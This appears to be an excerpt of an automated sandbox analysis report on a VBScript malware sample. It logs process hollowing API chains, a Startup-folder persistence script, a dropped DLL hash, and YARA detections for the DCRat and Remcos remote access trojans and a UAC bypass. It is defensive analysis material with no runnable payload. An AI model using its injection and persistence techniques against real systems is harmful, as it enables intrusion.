        Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
        Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
        Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
        Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
        Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
        Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{13709620-C279-11CE-A49E-444553540000}
        Source: C:\Windows\System32\wscript.exe COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs"
        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs"
        Source: C:\Windows\SysWOW64\wscript.exe Code function: 2_2_05660054 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread
        Source: C:\Windows\SysWOW64\wscript.exe Code function: 2_2_05660000 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread
        Source: C:\Windows\SysWOW64\wscript.exe Code function: 2_2_05E30054 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread
        Source: C:\Windows\SysWOW64\wscript.exe Code function: 2_2_05E30000 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread
        Source: C:\Windows\SysWOW64\wscript.exe Code function: 2_2_05E3003C CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread
        Source: C:\Windows\SysWOW64\wscript.exe Code function: 2_2_05EC0054 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread
        Source: C:\Windows\SysWOW64\wscript.exe Code function: 2_2_05EC0000 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread
        Source: C:\Windows\SysWOW64\wscript.exe Code function: 2_2_06230054 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread
        Source: C:\Windows\SysWOW64\wscript.exe Code function: 2_2_06230000 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread
        Source: C:\Windows\winhlp32.exe Code function: 17_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress
        Source: C:\Windows\winhlp32.exe Code function: 19_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress
        Source: C:\Windows\winhlp32.exe Code function: 21_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress
        Source: C:\Windows\winhlp32.exe Code function: 23_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress
        Source: C:\Windows\winhlp32.exe Code function: 27_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress
        Source: C:\Windows\SysWOW64\wscript.exe Code function: 2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exe Code function: 2_3_051A9FD1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 4_2_02D665D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 4_2_02D66EA0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 4_2_02D66288
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 4_2_02D6B590
        Source: C:\Windows\winhlp32.exe, Code function: 17_2_0043E0CC
        Source: C:\Windows\winhlp32.exe, Code function: 17_2_0041F0FA
        Source: C:\Windows\winhlp32.exe, Code function: 17_2_00454159
        Source: C:\Windows\winhlp32.exe, Code function: 17_2_00438168
        Source: C:\Windows\winhlp32.exe, Code function: 17_2_004461F0
        Source: C:\Windows\winhlp32.exe, Code function: 17_2_0043E2FB
        Source: C:\Windows\winhlp32.exe, Code function: 17_2_0045332B
        Source: C:\Windows\winhlp32.exe, Code function: 17_2_0042739D
        Source: C:\Windows\winhlp32.exe, Code function: 17_2_004374E6
        Source: C:\Windows\winhlp32.exe, Code function: 17_2_0043E558
        Source: C:\Windows\winhlp32.exe, Code function: 17_2_00438770
        Source: C:\Windows\winhlp32.exe, Code function: 17_2_004378FE
        Source: C:\Windows\winhlp32.exe, Code function: 17_2_00433946
        Source: C:\Windows\winhlp32.exe, Code function: 17_2_0044D9C9
        Source: C:\Windows\winhlp32.exe, Code function: 17_2_00427A46
        Source: C:\Windows\winhlp32.exe, Code function: 17_2_0041DB62
        Source: C:\Windows\winhlp32.exe, Code function: 17_2_00427BAF
        Source: C:\Windows\winhlp32.exe, Code function: 17_2_00437D33
        Source: C:\Windows\winhlp32.exe, Code function: 17_2_00435E5E
        Source: C:\Windows\winhlp32.exe, Code function: 17_2_00426E0E
        Source: C:\Windows\winhlp32.exe, Code function: 17_2_0043DE9D
        Source: C:\Windows\winhlp32.exe, Code function: 17_2_00413FCA
        Source: C:\Windows\winhlp32.exe, Code function: 17_2_00436FEA
        Source: C:\Windows\winhlp32.exe, Code function: 19_2_0043E0CC
        Source: C:\Windows\winhlp32.exe, Code function: 19_2_0041F0FA
        Source: C:\Windows\winhlp32.exe, Code function: 19_2_00454159
        Source: C:\Windows\winhlp32.exe, Code function: 19_2_00438168
        Source: C:\Windows\winhlp32.exe, Code function: 19_2_004461F0
        Source: C:\Windows\winhlp32.exe, Code function: 19_2_0043E2FB
        Source: C:\Windows\winhlp32.exe, Code function: 19_2_0045332B
        Source: C:\Windows\winhlp32.exe, Code function: 19_2_0042739D
        Source: C:\Windows\winhlp32.exe, Code function: 19_2_004374E6
        Source: C:\Windows\winhlp32.exe, Code function: 19_2_0043E558
        Source: C:\Windows\winhlp32.exe, Code function: 19_2_00438770
        Source: C:\Windows\winhlp32.exe, Code function: 19_2_004378FE
        Source: C:\Windows\winhlp32.exe, Code function: 19_2_00433946
        Source: C:\Windows\winhlp32.exe, Code function: 19_2_0044D9C9
        Source: C:\Windows\winhlp32.exe, Code function: 19_2_00427A46
        Source: C:\Windows\winhlp32.exe, Code function: 19_2_0041DB62
        Source: C:\Windows\winhlp32.exe, Code function: 19_2_00427BAF
        Source: C:\Windows\winhlp32.exe, Code function: 19_2_00437D33
        Source: C:\Windows\winhlp32.exe, Code function: 19_2_00435E5E
        Source: C:\Windows\winhlp32.exe, Code function: 19_2_00426E0E
        Source: C:\Windows\winhlp32.exe, Code function: 19_2_0043DE9D
        Source: C:\Windows\winhlp32.exe, Code function: 19_2_00413FCA
        Source: C:\Windows\winhlp32.exe, Code function: 19_2_00436FEA
        Source: C:\Windows\winhlp32.exe, Code function: 21_2_0043E0CC
        Source: C:\Windows\winhlp32.exe, Code function: 21_2_0041F0FA
        Source: C:\Windows\winhlp32.exe, Code function: 21_2_00454159
        Source: C:\Windows\winhlp32.exe, Code function: 21_2_00438168
        Source: C:\Windows\winhlp32.exe, Code function: 21_2_004461F0
        Source: C:\Windows\winhlp32.exe, Code function: 21_2_0043E2FB
        Source: C:\Windows\winhlp32.exe, Code function: 21_2_0045332B
        Source: C:\Windows\winhlp32.exe, Code function: 21_2_0042739D
        Source: C:\Windows\winhlp32.exe, Code function: 21_2_004374E6
        Source: C:\Windows\winhlp32.exe, Code function: 21_2_0043E558
        Source: C:\Windows\winhlp32.exe, Code function: 21_2_00438770
        Source: C:\Windows\winhlp32.exe, Code function: 21_2_004378FE
        Source: C:\Windows\winhlp32.exe, Code function: 21_2_00433946
        Source: C:\Windows\winhlp32.exe, Code function: 21_2_0044D9C9
        Source: C:\Windows\winhlp32.exe, Code function: 21_2_00427A46
        Source: C:\Windows\winhlp32.exe, Code function: 21_2_0041DB62
        Source: C:\Windows\winhlp32.exe, Code function: 21_2_00427BAF
        Source: C:\Windows\winhlp32.exe, Code function: 21_2_00437D33
        Source: C:\Windows\winhlp32.exe, Code function: 21_2_00435E5E
        Source: C:\Windows\winhlp32.exe, Code function: 21_2_00426E0E
        Source: C:\Windows\winhlp32.exe, Code function: 21_2_0043DE9D
        Source: C:\Windows\winhlp32.exe, Code function: 21_2_00413FCA
        Source: C:\Windows\winhlp32.exe, Code function: 21_2_00436FEA
        Source: C:\Windows\winhlp32.exe, Code function: 23_2_0043E0CC
        Source: C:\Windows\winhlp32.exe, Code function: 23_2_0041F0FA
        Source: C:\Windows\winhlp32.exe, Code function: 23_2_00454159
        Source: C:\Windows\winhlp32.exe, Code function: 23_2_00438168
        Source: C:\Windows\winhlp32.exe, Code function: 23_2_004461F0
        Source: C:\Windows\winhlp32.exe, Code function: 23_2_0043E2FB
        Source: C:\Windows\winhlp32.exe, Code function: 23_2_0045332B
        Source: C:\Windows\winhlp32.exe, Code function: 23_2_0042739D
        Source: C:\Windows\winhlp32.exe, Code function: 23_2_004374E6
        Source: C:\Windows\winhlp32.exe, Code function: 23_2_0043E558
        Source: C:\Windows\winhlp32.exe, Code function: 23_2_00438770
        Source: C:\Windows\winhlp32.exe, Code function: 23_2_004378FE
        Source: C:\Windows\winhlp32.exe, Code function: 23_2_00433946
        Source: C:\Windows\winhlp32.exe, Code function: 23_2_0044D9C9
        Source: C:\Windows\winhlp32.exe, Code function: 23_2_00427A46
        Source: C:\Windows\winhlp32.exe, Code function: 23_2_0041DB62
        Source: C:\Windows\winhlp32.exe, Code function: 23_2_00427BAF
        Source: C:\Windows\winhlp32.exe, Code function: 23_2_00437D33
        Source: C:\Windows\winhlp32.exe, Code function: 23_2_00435E5E
        Source: C:\Windows\winhlp32.exe, Code function: 23_2_00426E0E
        Source: C:\Windows\winhlp32.exe, Code function: 23_2_0043DE9D
        Source: C:\Windows\winhlp32.exe, Code function: 23_2_00413FCA
        Source: C:\Windows\winhlp32.exe, Code function: 23_2_00436FEA
        Source: C:\Windows\winhlp32.exe, Code function: 27_2_0043E0CC
        Source: C:\Windows\winhlp32.exe, Code function: 27_2_0041F0FA
        Source: C:\Windows\winhlp32.exe, Code function: 27_2_00454159
        Source: C:\Windows\winhlp32.exe, Code function: 27_2_00438168
        Source: C:\Windows\winhlp32.exe, Code function: 27_2_004461F0
        Source: C:\Windows\winhlp32.exe, Code function: 27_2_0043E2FB
        Source: C:\Windows\winhlp32.exe, Code function: 27_2_0045332B
        Source: C:\Windows\winhlp32.exe, Code function: 27_2_0042739D
        Source: C:\Windows\winhlp32.exe, Code function: 27_2_004374E6
        Source: C:\Windows\winhlp32.exe, Code function: 27_2_0043E558
        Source: C:\Windows\winhlp32.exe, Code function: 27_2_00438770
        Source: C:\Windows\winhlp32.exe, Code function: 27_2_004378FE
        Source: C:\Windows\winhlp32.exe, Code function: 27_2_00433946
        Source: C:\Windows\winhlp32.exe, Code function: 27_2_0044D9C9
        Source: C:\Windows\winhlp32.exe, Code function: 27_2_00427A46
        Source: C:\Windows\winhlp32.exe, Code function: 27_2_0041DB62
        Source: C:\Windows\winhlp32.exe, Code function: 27_2_00427BAF
        Source: C:\Windows\winhlp32.exe, Code function: 27_2_00437D33
        Source: C:\Windows\winhlp32.exe, Code function: 27_2_00435E5E
        Source: C:\Windows\winhlp32.exe, Code function: 27_2_00426E0E
        Source: C:\Windows\winhlp32.exe, Code function: 27_2_0043DE9D
        Source: C:\Windows\winhlp32.exe, Code function: 27_2_00413FCA
        Source: C:\Windows\winhlp32.exe, Code function: 27_2_00436FEA
        Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Temp\dynwrapx.dll 4EF3A6703ABC6B2B8E2CAC3031C1E5B86FE8B377FDE92737349EE52BD2604379
        Source: C:\Windows\winhlp32.exe, Code function: String function: 00402213 appears 95 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 0040159A appears 35 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 0040159F appears 35 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 0043A34C appears 40 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 00402218 appears 40 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 00407200 appears 55 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 004052FD appears 80 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 00403093 appears 40 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 00434E10 appears 270 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 004576B0 appears 32 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 0040417E appears 115 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 0040482D appears 35 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 00402093 appears 250 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 00434770 appears 205 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 0040915B appears 40 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 00409052 appears 40 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 00401F86 appears 55 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 00401E65 appears 170 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 0040274D appears 45 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 00401FAB appears 95 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 0043C26E appears 70 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 00411F67 appears 80 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 0040C1D8 appears 45 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 0043C0CF appears 65 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 004020DF appears 100 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 00457A28 appears 85 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 004484CA appears 90 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 004458D0 appears 140 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 004046F7 appears 85 times
        Source: C:\Windows\winhlp32.exe, Code function: String function: 0040223D appears 42 times
        Source: lmg1_Mlakaifa443456.vbs, Initial sample: Strings found which are bigger than 50
        Source: dump.pcap, type: PCAP, Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 2.2.wscript.exe.5670000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 2.2.wscript.exe.5670000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding base64-encoded APIs, command lines, registry keys, etc.
        Source: 2.2.wscript.exe.5670000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
        Source: 2.2.wscript.exe.5670000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 2.2.wscript.exe.5670000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 2.2.wscript.exe.5670000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding base64-encoded APIs, command lines, registry keys, etc.
        Source: 2.2.wscript.exe.5670000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
        Source: 2.2.wscript.exe.5670000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 2.2.wscript.exe.6240000.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 2.2.wscript.exe.6240000.3.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding base64-encoded APIs, command lines, registry keys, etc.
        Source: 2.2.wscript.exe.6240000.3.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
        Source: 2.2.wscript.exe.6240000.3.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 2.2.wscript.exe.6240000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding base64-encoded APIs, command lines, registry keys, etc.
        Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
        Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 2.2.wscript.exe.6240000.3.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding base64-encoded APIs, command lines, registry keys, etc.
        Source: 2.2.wscript.exe.6240000.3.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
        Source: 2.2.wscript.exe.6240000.3.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding base64-encoded APIs, command lines, registry keys, etc.
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 2.2.wscript.exe.5e40000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 2.2.wscript.exe.5e40000.1.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding base64-encoded APIs, command lines, registry keys, etc.
        Source: 2.2.wscript.exe.5e40000.1.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
        Source: 2.2.wscript.exe.5e40000.1.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 2.2.wscript.exe.5ed0000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 2.2.wscript.exe.5ed0000.2.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding base64-encoded APIs, command lines, registry keys, etc.
        Source: 2.2.wscript.exe.5ed0000.2.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
        Source: 2.2.wscript.exe.5ed0000.2.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 2.2.wscript.exe.5e40000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 2.2.wscript.exe.5e40000.1.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding base64-encoded APIs, command lines, registry keys, etc.
        Source: 2.2.wscript.exe.5e40000.1.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
        Source: 2.2.wscript.exe.5e40000.1.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 31.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 31.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 31.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 27.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 27.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 27.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 33.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
